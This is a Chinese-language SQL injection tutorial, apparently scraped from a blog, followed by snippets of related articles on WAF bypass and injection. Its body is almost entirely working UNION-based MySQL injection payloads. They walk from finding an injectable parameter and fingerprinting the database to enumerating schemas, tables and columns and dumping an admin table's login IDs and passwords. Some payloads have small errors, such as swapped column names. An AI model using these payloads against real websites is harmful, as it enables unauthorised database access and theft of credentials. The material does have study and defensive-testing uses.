注入篇

一、简易注入

0x1判断注入点

常用的有  and 1=1 and 1=2  ‘  "

0x2判断数据库类型

and user>0 报错  and version()>0正常 则为mysql数据库

0x3猜解当前网页的字段数

order by num

0x4爆出当前网页显示位

and 1=2 union select 1,2,3,4,....,num --

0x5爆出数据库基本信息

//假设显示位为2

and 1=2 union select 1,concat(user(),0x20,database(),0x20,version()),3,4,...,num --

User() 查看用户

database()  --查看数据库名称

Version() --查看数据库版本

@@datadir --数据库路径

@@version_compile_os--操作系统版本

system_user() --系统用户名

current_user()--当前用户名

session_user()--连接数据库的用户名

为了显示信息更方便,这里在构造sql查询语句中使用了concat函数,它连接一个或者多个字符串, 有任何一个参数为NULL ,则返回值为 NULL。还有group_concat()和concat_ws()

0x6爆出所有数据库名

//一般都有information_schema数据库

and 1=2 union select 1,group_concat(distinct+table_schema),3,4,...,num+from+information_schema.columns --

0x7爆出当前数据库表名

and 1=2 union select 1,group_concat(distinct+table_schema),3,4,...,num from information_schema.tables+where +table_schema=database() --

爆出数据库所有表名

and 1=2 union select 1,group_concat(distinct+table_name),3,4,...,num from information_schema.tables+where +table_schema=database() --

0x8爆出当前数据库表字段

and 1=2 union select 1,group_concat(distinct+table_schema),3,4,...,num

from+information_schema.columns+where+table_name=0x544D5F41444D494E5F4D454D42552(该十六进制为TM_ADMIN_MEMBER) --

0x9爆出数据库表的数据

//这里假设爆出来的表的字段名为amdin_id login_id login_pwd

and 1=2 union select 1,group_concat(admin_id,0x2B,login_uid,0x2B,login_pwd),3,4,...,num

from+TM_ADMIN_MEMBER --

时间: 2024-10-25 19:50:21

注入篇的相关文章

[转载]我的WafBypass之道(SQL注入篇)

现在位置: 首页 > 文章 > Web安全 > 正文 我的WafBypass之道(SQL注入篇) 2016 /11/23 16:16 6,444 评论 3 条 [本文转自安全脉搏战略合作伙伴先知技术社区 原帖地址  安全脉搏编辑huan9740整理发布] 0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常 谈的话题也没什么可写的. 很多人一遇到waf就发懵,不知如何是好,能搜到的各 种姿势也是然并卵. 但是积累姿势的过程也是迭代的,那么就有了此文,用来

mysql注入篇

博客这个东西真的很考验耐心,每写一篇笔记,都是在艰难的决定中施行的,毕竟谁都有懒惰的一面,就像这个,mysql注入篇,拖拖拖一直拖到现在才开始总结,因为这个实在是太多太杂了,细细的总结一篇太烧脑. 由于我没有找见php的实战本地源码,所以只好用一些漏洞平台的源码来演示了,演示不了的,只能列代码,没有实操图.毕竟找不见源码,,没法... 首先我们都知道mysql数据库和Access数据库的不同,不同在mysql是分多个数据库名的. 就像像我上图贴的这个格式一样,原谅我是在是没有本地源码,连数据库的

Java自动化测试框架-09 - TestNG之依赖注入篇 (详细教程)

1.-依赖注入 TestNG支持两种不同类型的依赖项注入:本机(由TestNG本身执行)和外部(由诸如Guice的依赖项注入框架执行). 1.1-本机依赖项注入 TestNG允许您在方法中声明其他参数.发生这种情况时,TestNG将自动用正确的值填充这些参数.依赖注入可以在以下地方使用: 任何@Before方法或@Test方法都可以声明ITestContext类型的参数.任何@AfterMethod方法都可以声明ITestResult类型的参数,该参数将反映刚刚运行的测试方法的结果.任何@Bef

我的WafBypass之道(SQL注入篇)

原帖地址:https://xianzhi.aliyun.com/forum/read/349.html 0x00 前言 去年到现在就一直有人希望我出一篇关于waf绕过的文章,我觉得这种老生常 谈的话题也没什么可写的. 很多人一遇到waf就发懵,不知如何是好,能搜到的各 种姿势也是然并卵. 但是积累姿势的过程也是迭代的,那么就有了此文,用来总 结一些学习和培养突破waf的思想. 可能总结的并不全,但目的并不是讲那些网上 搜来一大把的东西,So-并不会告诉大家现有的姿势, 而是突破Waf Bypas

ASP.NET 之 防SQL注入篇

1. 什么是SQL注入     所谓SQL注入,就是通过把SQL命令插入到表单窗体递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行一些恶意的SQL命令.通过递交参数构造巧妙的SQL语句,从而成功获取想要的数据. 2. SQL注入的种类从具体而言,SQL注入可分为五大类,分别是:数字型注入.字符型注入.搜索型注入(like).in型的注入.句语连接型注入.从应用来说,要特别注意IP.搜索.批量删除.从数据库转到数据库等地方的SQL注入. 3,如何进行的注入 下面我们看一个典型例子 1S

PHP代码审计SQL注入篇

什么是SQL注入 SQL注入攻击(SQL Injection),简称注入攻击,是Web开发中最常见的一种安全漏洞.可以用它来从数据库获取敏感信息,或者利用数据库的特性执行添加用户,导出文件等一系列恶意操作,甚至有可能获取数据库乃至系统用户最高权限. 而造成SQL注入的原因是因为程序没有有效过滤用户的输入,使攻击者成功的向服务器提交恶意的SQL查询代码,程序在接收后错误的将攻击者的输入作为查询语句的一部分执行,导致原始的查询逻辑被改变,额外的执行了攻击者精心构造的恶意代码. SQL注入实例 很多W

Sql server之sql注入篇

SQL Injection 关于sql注入的危害在这里就不多做介绍了,相信大家也知道其中的厉害关系.这里有一些sql注入的事件大家感兴趣可以看一下 防范sql注入的方法无非有以下几种: 1.使用类型安全的SQL参数2.使用参数化输入存储过程3.使用参数集合与动态SQL4.输入滤波5.过滤LIKE条款的特殊字符 ...如果有遗漏的也欢迎园子的大大们指教. Sample: var Shipcity; ShipCity = Request.form ("ShipCity"); var sql

Mysql特别注入篇

基于insert/update/delete的注入 一般处在于信息修改处(如注册,修改用户名密码等),可使用单引号进行注入尝试,含有注入漏洞处若开启了mysql显错函数则可看到错误页面 利用的条件: 需要注意的是,报错注入需要通过php中的mysql_error()显示. 下面的例子: $sql = mysql_query('select * from users where id=1 and updatexml(0,concat(0x7e,(select version())),1)'); $

[转载]我的WafBypass之道(Misc篇)

厉害,满满的干货,让我膜一下 现在位置: 首页 > 文章 > Web安全 > 文章 > 代码审计 > 正文 我的WafBypass之道(Misc篇) 2017 /2/13 17:17 4,445 沙发 先知技术社区独家发表本文,如需要转载,请先联系先知技术社区授权:未经授权请勿转载.先知技术社区投稿邮箱:Aliyun_xianzhi#service.alibaba.com: Author:Tr3jer_CongRong Blog:www.Thinkings.org 第一篇&l